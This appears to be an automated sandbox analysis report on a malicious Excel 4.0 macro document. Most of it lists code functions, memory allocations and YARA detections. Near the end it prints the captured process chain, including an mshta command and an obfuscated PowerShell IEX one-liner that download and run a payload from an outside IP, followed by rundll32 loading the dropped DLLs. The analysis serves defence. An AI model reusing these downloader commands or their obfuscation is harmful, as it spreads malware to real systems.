Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0048FF31 11_2_0048FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0047CFCE 11_2_0047CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00471F9B 11_2_00471F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00472FA1 11_2_00472FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00473FB8 11_2_00473FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002704B8 12_2_002704B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027BE8C 12_2_0027BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027EE94 12_2_0027EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026EC9B 12_2_0026EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027E498 12_2_0027E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002670ED 12_2_002670ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00275CF9 12_2_00275CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002774DD 12_2_002774DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026F93D 12_2_0026F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00269700 12_2_00269700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00273512 12_2_00273512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00281B54 12_2_00281B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00268D95 12_2_00268D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027B391 12_2_0027B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026B821 12_2_0026B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027542E 12_2_0027542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027A429 12_2_0027A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00266C29 12_2_00266C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00271831 12_2_00271831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00262830 12_2_00262830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027363D 12_2_0027363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027561F 12_2_0027561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00266A1F 12_2_00266A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026B41A 12_2_0026B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00276864 12_2_00276864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0028146E 12_2_0028146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026E86A 12_2_0026E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027026B 12_2_0027026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00280867 12_2_00280867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00283672 12_2_00283672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00269A7D 12_2_00269A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026CA43 12_2_0026CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026E243 12_2_0026E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00275040 12_2_00275040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026C850 12_2_0026C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00268650 12_2_00268650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00266083 12_2_00266083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027CC89 12_2_0027CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027109E 12_2_0027109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027129C 12_2_0027129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026AE9A 12_2_0026AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002688F4 12_2_002688F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002764F1 12_2_002764F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002644FA 12_2_002644FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00266ED6 12_2_00266ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027D8D7 12_2_0027D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027ACD3 12_2_0027ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002804DE 12_2_002804DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002668DE 12_2_002668DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026472E 12_2_0026472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00270D33 12_2_00270D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027FF31 12_2_0027FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026BD0F 12_2_0026BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026C309 12_2_0026C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026911A 12_2_0026911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026AB66 12_2_0026AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00278D71 12_2_00278D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026777B 12_2_0026777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00270946 12_2_00270946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00273D41 12_2_00273D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026194C 12_2_0026194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026BB4B 12_2_0026BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027A156 12_2_0027A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00274B56 12_2_00274B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026F154 12_2_0026F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00280D5B 12_2_00280D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00272753 12_2_00272753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00261950 12_2_00261950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002741A7 12_2_002741A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00262FA1 12_2_00262FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002799AA 12_2_002799AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027C9A9 12_2_0027C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00263FB8 12_2_00263FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00279186 12_2_00279186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00267B82 12_2_00267B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027C38F 12_2_0027C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026F58F 12_2_0026F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026FD8C 12_2_0026FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00281993 12_2_00281993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00261F9B 12_2_00261F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00272BF6 12_2_00272BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027EBFF 12_2_0027EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026CFCE 12_2_0026CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002745CD 12_2_002745CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00277BCA 12_2_00277BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0027D3C8 12_2_0027D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00345CF9 14_2_00345CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00339700 14_2_00339700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00332830 14_2_00332830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00341831 14_2_00341831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034363D 14_2_0034363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033B821 14_2_0033B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00336C29 14_2_00336C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034542E 14_2_0034542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034A429 14_2_0034A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033B41A 14_2_0033B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034561F 14_2_0034561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00336A1F 14_2_00336A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00353672 14_2_00353672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00339A7D 14_2_00339A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00346864 14_2_00346864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00350867 14_2_00350867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033E86A 14_2_0033E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0035146E 14_2_0035146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034026B 14_2_0034026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033C850 14_2_0033C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00338650 14_2_00338650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033CA43 14_2_0033CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033E243 14_2_0033E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00345040 14_2_00345040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003404B8 14_2_003404B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034EE94 14_2_0034EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033EC9B 14_2_0033EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034129C 14_2_0034129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033AE9A 14_2_0033AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034109E 14_2_0034109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034E498 14_2_0034E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00336083 14_2_00336083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034BE8C 14_2_0034BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034CC89 14_2_0034CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003464F1 14_2_003464F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003388F4 14_2_003388F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003344FA 14_2_003344FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003370ED 14_2_003370ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034D8D7 14_2_0034D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00336ED6 14_2_00336ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034ACD3 14_2_0034ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003474DD 14_2_003474DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003504DE 14_2_003504DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003368DE 14_2_003368DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034FF31 14_2_0034FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00340D33 14_2_00340D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033F93D 14_2_0033F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033472E 14_2_0033472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00343512 14_2_00343512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033911A 14_2_0033911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033C309 14_2_0033C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033BD0F 14_2_0033BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00348D71 14_2_00348D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033777B 14_2_0033777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033AB66 14_2_0033AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00351B54 14_2_00351B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034A156 14_2_0034A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00344B56 14_2_00344B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00331950 14_2_00331950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033F154 14_2_0033F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00342753 14_2_00342753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00350D5B 14_2_00350D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00340946 14_2_00340946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00343D41 14_2_00343D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033BB4B 14_2_0033BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033194C 14_2_0033194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00333FB8 14_2_00333FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00332FA1 14_2_00332FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003441A7 14_2_003441A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034C9A9 14_2_0034C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003499AA 14_2_003499AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034B391 14_2_0034B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00338D95 14_2_00338D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00351993 14_2_00351993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00331F9B 14_2_00331F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00337B82 14_2_00337B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00349186 14_2_00349186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034C38F 14_2_0034C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033F58F 14_2_0033F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033FD8C 14_2_0033FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00342BF6 14_2_00342BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034EBFF 14_2_0034EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003445CD 14_2_003445CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0034D3C8 14_2_0034D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0033CFCE 14_2_0033CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00347BCA 14_2_00347BCA
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 3DBB.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: 80_513972285.xls Macro extractor: Sheet name: Macro1
Source: 80_513972285.xls Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0026C67D DeleteService, 12_2_0026C67D
Yara signature match
Source: 80_513972285.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 80_513972285.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Klovgjl\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: 80_513972285.xls OLE indicator, VBA macros: true
Source: 80_513972285.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/36
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 80_513972285.xls OLE indicator, Workbook stream: true
Source: 80_513972285.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 80_513972285.xls ReversingLabs: Detection: 33%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........K............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................*D.k....................................}..v.....M......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................*D.k..... ..............................}..v....PN......0.................K............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................E.k....................................}..v.....Z......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................E.k......K.............................}..v.... [......0...............(.K............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................F.k....................................}..v....8.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................F.k....X.K.............................}..v............0.................K............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................].k....E...............................}..v....p'......0.................K............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+................].k....E...............................}..v.....e......0.................K............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.......:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer Jump to behavior
